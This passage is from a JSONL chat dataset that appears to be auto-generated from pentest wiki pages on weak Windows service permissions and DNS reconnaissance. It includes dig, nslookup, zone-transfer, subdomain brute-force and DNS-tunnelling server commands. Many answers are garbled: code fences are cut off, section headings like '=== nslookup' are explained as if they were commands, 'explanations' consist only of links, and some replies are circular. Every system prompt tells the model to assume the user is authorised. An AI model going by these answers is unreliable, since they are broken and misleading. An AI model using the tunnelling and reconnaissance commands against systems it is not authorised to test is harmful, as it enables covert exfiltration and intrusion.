the localaccounttokenfilterpolicy. Configuring the LocalAccountTokenFilterPolicy", "metadata": {"corpus_index": 1466, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Weak service permissions - Ressources?"}, {"role": "assistant", "content": "https://kb.cybertecsecurity.com/knowledge/localaccounttokenfilterpolicy\n\nhttps://offsec.blog/hidden-danger-how-to-identify-and-mitigate-insecure-windows-services/"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Weak service permissions - Ressources?", "response": "https://kb.cybertecsecurity.com/knowledge/localaccounttokenfilterpolicy\n\nhttps://offsec.blog/hidden-danger-how-to-identify-and-mitigate-insecure-windows-services/", "metadata": {"corpus_index": 1467, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Weak service permissions - Ressources?"}, {"role": "assistant", "content": "https://kb.cybertecsecurity.com/knowledge/localaccounttokenfilterpolicy\n\nhttps://offsec.blog/hidden-danger-how-to-identify-and-mitigate-insecure-windows-services/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Weak service permissions - Ressources?", "response": "https://kb.cybertecsecurity.com/knowledge/localaccounttokenfilterpolicy\n\nhttps://offsec.blog/hidden-danger-how-to-identify-and-mitigate-insecure-windows-services/", "metadata": {"corpus_index": 1467, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ DNS - Theory work?"}, {"role": "assistant", "content": "The Domain Name System (DNS) is a fundamental protocol of the Internet that translates human-readable domain names into IP addresses. It functions as a distributed database system that enables computers to resolve domain names to the corresponding network addresses required for network communication.\n\nDNS operates on port 53 by default and uses both TCP and UDP protocols. The system is hierarchical, with root servers at the top, followed by Top-Level Domain (TLD) servers, and authoritative name servers for specific domains."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ DNS - Theory work?", "response": "The Domain Name System (DNS) is a fundamental protocol of the Internet that translates human-readable domain names into IP addresses. It functions as a distributed database system that enables computers to resolve domain names to the corresponding network addresses required for network communication.\n\nDNS operates on port 53 by default and uses both TCP and UDP protocols. The system is hierarchical, with root servers at the top, followed by Top-Level Domain (TLD) servers, and authoritative name servers for specific domains.", "metadata": {"corpus_index": 1468, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ DNS - Theory"}, {"role": "assistant", "content": "The Domain Name System (DNS) is a fundamental protocol of the Internet that translates human-readable domain names into IP addresses. It functions as a distributed database system that enables computers to resolve domain names to the corresponding network addresses required for network communication.\n\nDNS operates on port 53 by default and uses both TCP and UDP protocols. The system is hierarchical, with root servers at the top, followed by Top-Level Domain (TLD) servers, and authoritative name servers for specific domains."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ DNS - Theory", "response": "The Domain Name System (DNS) is a fundamental protocol of the Internet that translates human-readable domain names into IP addresses. It functions as a distributed database system that enables computers to resolve domain names to the corresponding network addresses required for network communication.\n\nDNS operates on port 53 by default and uses both TCP and UDP protocols. The system is hierarchical, with root servers at the top, followed by Top-Level Domain (TLD) servers, and authoritative name servers for specific domains.", "metadata": {"corpus_index": 1468, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ DNS - Enumeration"}, {"role": "assistant", "content": "DNS enumeration involves gathering information about a domain's DNS infrastructure. This can be accomplished through various methods and tools."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ DNS - Enumeration", "response": "DNS enumeration involves gathering information about a domain's DNS infrastructure. This can be accomplished through various methods and tools.", "metadata": {"corpus_index": 1469, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ DNS - Enumeration?"}, {"role": "assistant", "content": "DNS enumeration involves gathering information about a domain's DNS infrastructure. This can be accomplished through various methods and tools."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ DNS - Enumeration?", "response": "DNS enumeration involves gathering information about a domain's DNS infrastructure. This can be accomplished through various methods and tools.", "metadata": {"corpus_index": 1469, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ DNS - DNS Queries"}, {"role": "assistant", "content": "=== dig\nThe dig utility performs DNS lookups and displays responses from name servers.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ DNS - DNS Queries", "response": "=== dig\nThe dig utility performs DNS lookups and displays responses from name servers.\n\n```bash", "metadata": {"corpus_index": 1470, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ DNS - DNS Queries"}, {"role": "assistant", "content": "=== dig\nThe dig utility performs DNS lookups and displays responses from name servers.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ DNS - DNS Queries", "response": "=== dig\nThe dig utility performs DNS lookups and displays responses from name servers.\n\n```bash", "metadata": {"corpus_index": 1470, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trace DNS resolution path in the context of penetration testing"}, {"role": "assistant", "content": "dig thehacker.recipes +trace\n``\n\n=== nslookup\nnslookup provides DNS query functionality and debugging capabilities.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trace DNS resolution path in the context of penetration testing", "response": "dig thehacker.recipes +trace\n``\n\n=== nslookup\nnslookup provides DNS query functionality and debugging capabilities.\n\n``bash", "metadata": {"corpus_index": 1471, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Trace DNS resolution path?"}, {"role": "assistant", "content": "dig thehacker.recipes +trace\n``\n\n=== nslookup\nnslookup provides DNS query functionality and debugging capabilities.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Trace DNS resolution path?", "response": "dig thehacker.recipes +trace\n``\n\n=== nslookup\nnslookup provides DNS query functionality and debugging capabilities.\n\n``bash", "metadata": {"corpus_index": 1471, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Trace DNS resolution path?"}, {"role": "assistant", "content": "=== nslookup\nnslookup provides DNS query functionality and debugging capabilities."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Trace DNS resolution path?", "response": "=== nslookup\nnslookup provides DNS query functionality and debugging capabilities.", "metadata": {"corpus_index": 1472, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== nslookup`?"}, {"role": "assistant", "content": "This command is used for trace dns resolution path. Trace DNS resolution path"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== nslookup`?", "response": "This command is used for trace dns resolution path. Trace DNS resolution path", "metadata": {"corpus_index": 1472, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Query specific DNS server in the context of penetration testing"}, {"role": "assistant", "content": "nslookup thehacker.recipes $DNS_IP\n``\n\n=== host\nhost performs DNS lookups with a simplified interface.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Query specific DNS server in the context of penetration testing", "response": "nslookup thehacker.recipes $DNS_IP\n``\n\n=== host\nhost performs DNS lookups with a simplified interface.\n\n``bash", "metadata": {"corpus_index": 1473, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Query specific DNS server"}, {"role": "assistant", "content": "nslookup thehacker.recipes $DNS_IP\n``\n\n=== host\nhost performs DNS lookups with a simplified interface.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Query specific DNS server", "response": "nslookup thehacker.recipes $DNS_IP\n``\n\n=== host\nhost performs DNS lookups with a simplified interface.\n\n``bash", "metadata": {"corpus_index": 1473, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Query specific DNS server"}, {"role": "assistant", "content": "=== host\nhost performs DNS lookups with a simplified interface."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Query specific DNS server", "response": "=== host\nhost performs DNS lookups with a simplified interface.", "metadata": {"corpus_index": 1474, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== host`?"}, {"role": "assistant", "content": "This command is used for query specific dns server. Query specific DNS server"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== host`?", "response": "This command is used for query specific dns server. Query specific DNS server", "metadata": {"corpus_index": 1474, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Reverse DNS lookup?"}, {"role": "assistant", "content": "host $IP_ADDRESS\n``\n\n=== whois\nwhois retrieves registration information for domains.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Reverse DNS lookup?", "response": "host $IP_ADDRESS\n``\n\n=== whois\nwhois retrieves registration information for domains.\n\n``bash", "metadata": {"corpus_index": 1475, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Reverse DNS lookup?"}, {"role": "assistant", "content": "host $IP_ADDRESS\n``\n\n=== whois\nwhois retrieves registration information for domains.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Reverse DNS lookup?", "response": "host $IP_ADDRESS\n``\n\n=== whois\nwhois retrieves registration information for domains.\n\n``bash", "metadata": {"corpus_index": 1475, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Reverse DNS lookup during a pentest?"}, {"role": "assistant", "content": "=== whois\nwhois retrieves registration information for domains."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Reverse DNS lookup during a pentest?", "response": "=== whois\nwhois retrieves registration information for domains.", "metadata": {"corpus_index": 1476, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== whois`?"}, {"role": "assistant", "content": "This command is used for reverse dns lookup. Reverse DNS lookup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== whois`?", "response": "This command is used for reverse dns lookup. Reverse DNS lookup", "metadata": {"corpus_index": 1476, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ DNS - Zone Transfers?"}, {"role": "assistant", "content": "Zone transfers (AXFR requests) are a DNS protocol feature that allows a secondary DNS server to receive all DNS records from a primary DNS server. While legitimate for DNS replication, misconfigured servers allowing unauthorized zone transfers can expose complete domain information to potential attackers.\n\nCommon signs of misconfiguration include:\n- Allowing zone transfers from any source IP\n- Missing ACLs for AXFR requests\n- Exposed internal DNS records\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ DNS - Zone Transfers?", "response": "Zone transfers (AXFR requests) are a DNS protocol feature that allows a secondary DNS server to receive all DNS records from a primary DNS server. While legitimate for DNS replication, misconfigured servers allowing unauthorized zone transfers can expose complete domain information to potential attackers.\n\nCommon signs of misconfiguration include:\n- Allowing zone transfers from any source IP\n- Missing ACLs for AXFR requests\n- Exposed internal DNS records\n\n```bash", "metadata": {"corpus_index": 1477, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ DNS - Zone Transfers"}, {"role": "assistant", "content": "Zone transfers (AXFR requests) are a DNS protocol feature that allows a secondary DNS server to receive all DNS records from a primary DNS server. While legitimate for DNS replication, misconfigured servers allowing unauthorized zone transfers can expose complete domain information to potential attackers.\n\nCommon signs of misconfiguration include:\n- Allowing zone transfers from any source IP\n- Missing ACLs for AXFR requests\n- Exposed internal DNS records\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ DNS - Zone Transfers", "response": "Zone transfers (AXFR requests) are a DNS protocol feature that allows a secondary DNS server to receive all DNS records from a primary DNS server. While legitimate for DNS replication, misconfigured servers allowing unauthorized zone transfers can expose complete domain information to potential attackers.\n\nCommon signs of misconfiguration include:\n- Allowing zone transfers from any source IP\n- Missing ACLs for AXFR requests\n- Exposed internal DNS records\n\n```bash", "metadata": {"corpus_index": 1477, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Alternative using fierce for zone transfers"}, {"role": "assistant", "content": "fierce --domain $DOMAIN --dns-servers $DNS_IP\n```\n\n> [!NOTE]\n> Modern DNS servers typically restrict zone transfers by default. Success usually indicates a misconfiguration."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Alternative using fierce for zone transfers", "response": "fierce --domain $DOMAIN --dns-servers $DNS_IP\n```\n\n> [!NOTE]\n> Modern DNS servers typically restrict zone transfers by default. Success usually indicates a misconfiguration.", "metadata": {"corpus_index": 1478, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Alternative using fierce for zone transfers?"}, {"role": "assistant", "content": "fierce --domain $DOMAIN --dns-servers $DNS_IP\n```\n\n> [!NOTE]\n> Modern DNS servers typically restrict zone transfers by default. Success usually indicates a misconfiguration."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Alternative using fierce for zone transfers?", "response": "fierce --domain $DOMAIN --dns-servers $DNS_IP\n```\n\n> [!NOTE]\n> Modern DNS servers typically restrict zone transfers by default. Success usually indicates a misconfiguration.", "metadata": {"corpus_index": 1478, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ DNS - Subdomain Enumeration in the context of penetration testing"}, {"role": "assistant", "content": "DNSRecon enables comprehensive DNS reconnaissance, including subdomain discovery and record analysis.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ DNS - Subdomain Enumeration in the context of penetration testing", "response": "DNSRecon enables comprehensive DNS reconnaissance, including subdomain discovery and record analysis.\n\n```bash", "metadata": {"corpus_index": 1479, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ DNS - Subdomain Enumeration?"}, {"role": "assistant", "content": "DNSRecon enables comprehensive DNS reconnaissance, including subdomain discovery and record analysis.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ DNS - Subdomain Enumeration?", "response": "DNSRecon enables comprehensive DNS reconnaissance, including subdomain discovery and record analysis.\n\n```bash", "metadata": {"corpus_index": 1479, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Brute force with wordlist"}, {"role": "assistant", "content": "dnsrecon -d example.com -D $WORDLIST -t std --xml $OUTPUT.xml\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Brute force with wordlist", "response": "dnsrecon -d example.com -D $WORDLIST -t std --xml $OUTPUT.xml\n```", "metadata": {"corpus_index": 1480, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Brute force with wordlist"}, {"role": "assistant", "content": "dnsrecon -d example.com -D $WORDLIST -t std --xml $OUTPUT.xml\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Brute force with wordlist", "response": "dnsrecon -d example.com -D $WORDLIST -t std --xml $OUTPUT.xml\n```", "metadata": {"corpus_index": 1480, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ DNS - DNS Tunneling"}, {"role": "assistant", "content": "DNS tunneling exploits DNS protocol for data exfiltration or command and control communication. While legitimate uses exist (e.g., software updates), the technique is often employed maliciously.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ DNS - DNS Tunneling", "response": "DNS tunneling exploits DNS protocol for data exfiltration or command and control communication. While legitimate uses exist (e.g., software updates), the technique is often employed maliciously.\n\n```bash", "metadata": {"corpus_index": 1481, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ DNS - DNS Tunneling"}, {"role": "assistant", "content": "DNS tunneling exploits DNS protocol for data exfiltration or command and control communication. While legitimate uses exist (e.g., software updates), the technique is often employed maliciously.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ DNS - DNS Tunneling", "response": "DNS tunneling exploits DNS protocol for data exfiltration or command and control communication. While legitimate uses exist (e.g., software updates), the technique is often employed maliciously.\n\n```bash", "metadata": {"corpus_index": 1481, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Server configuration?"}, {"role": "assistant", "content": "sudo python dnscapy_server.py $DELEGATED_ZONE_NAME $EXTERNAL_IP_ADDR"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Server configuration?", "response": "sudo python dnscapy_server.py $DELEGATED_ZONE_NAME $EXTERNAL_IP_ADDR", "metadata": {"corpus_index": 1482, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Server configuration"}, {"role": "assistant", "content": "sudo python dnscapy_server.py $DELEGATED_ZONE_NAME $EXTERNAL_IP_ADDR"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Server configuration", "response": "sudo python dnscapy_server.py $DELEGATED_ZONE_NAME $EXTERNAL_IP_ADDR", "metadata": {"corpus_index": 1482, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": 